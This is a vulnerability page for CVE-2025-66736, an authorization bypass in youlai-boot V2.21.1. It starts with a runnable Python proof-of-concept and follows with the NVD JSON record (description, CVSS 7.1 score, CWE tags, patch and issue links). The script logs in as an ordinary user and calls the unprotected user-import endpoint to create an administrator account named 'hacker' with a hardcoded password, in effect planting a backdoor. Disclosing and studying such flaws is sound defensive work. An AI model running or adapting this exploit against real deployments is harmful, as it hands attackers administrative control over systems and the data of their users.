CVE-2025-66736

# CVE-2025-66736 PoC - youlai-boot Unauthorized User Import import requests import json target_url = "http://target-server:8080/api/sys/user/import" # Login as regular user to get valid session login_url = "http://target-server:8080/api/auth/login" login_data = { "username": "regular_user", "password": "user_password" } session = requests.Session() login_response = session.post(login_url, json=login_data) if login_response.status_code == 200: print("[+] Login successful as regular user") # Prepare malicious user data for import # This creates an admin user with username: hacker, password: P@ssw0rd123 import_data = { "username": "hacker", "nickName": "Hacker Account", "email": "[email protected]", "password": "P@ssw0rd123", "roleIds": [1], # Admin role ID "status": 1 } # Send the import request without admin privileges headers = { "Content-Type": "application/json" } exploit_response = session.post(target_url, json=import_data, headers=headers) if exploit_response.status_code == 200: print("[+] VULNERABLE! Admin user created successfully") print("[+] Username: hacker, Password: P@ssw0rd123") else: print("[-] Request failed or patch applied") else: print("[-] Login failed")

{"cve": {"id": "CVE-2025-66736", "sourceIdentifier": "[email protected]", "published": "2025-12-22T21:15:44.917", "lastModified": "2026-01-06T15:17:32.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "youlai-boot V2.21.1 is vulnerable to Incorrect Access Control. The importUsers function in SysUserController.java does not perform a permission check on the current user's identity, which may allow regular users to import user data into the database, resulting in an authorization bypass vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:youlai:youlai-boot:2.21.1:*:*:*:*:*:*:*", "matchCriteriaId": "7CFBFBA2-A744-4EAE-A0F1-78CAE3F65176"}]}]}], "references": [{"url": "https://gist.github.com/old6ma/be1d4a5373ee2de901ed4c8d81485046", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://gitee.com/youlaiorg/youlai-boot/commit/9197065102f92264ded814a9d3e9f2a4ff0da121", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://gitee.com/youlaiorg/youlai-boot/issues/ICH8FV", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}